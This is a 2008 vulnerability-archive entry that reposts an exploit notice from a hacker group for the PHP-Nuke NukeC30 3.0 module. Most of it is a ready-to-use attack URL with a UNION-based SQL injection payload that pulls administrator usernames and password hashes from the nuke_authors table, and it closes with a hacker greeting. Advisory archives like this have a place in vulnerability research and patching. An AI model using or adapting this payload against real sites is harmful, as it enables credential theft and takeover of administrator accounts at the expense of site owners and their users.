PHP-Nuke Module NukeC30 sql injection

2008-03-11T00:00:00
ID SECURITYVULNS:DOC:19379
Type securityvulns
Reporter Securityvulns
Modified 2008-03-11T00:00:00

Description


----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------

= Author : HouSSaMix from H-T Team

= Script : PHP-Nuke Module NukeC30
Module's Name: NukeC30 Module's Version: 3.0

= BUG : Remote SQL Injection

= Exploit :
http://Target/[path]/modules.php?name=NukeC30&op=ViewCatg&id_catg=[SQL]

[SQL]= -1//union//select//concat(aid,0x3a,pwd),2//from/*/nuke_authors/where%20admin%20-2

= Greetz : All muslims HaCkers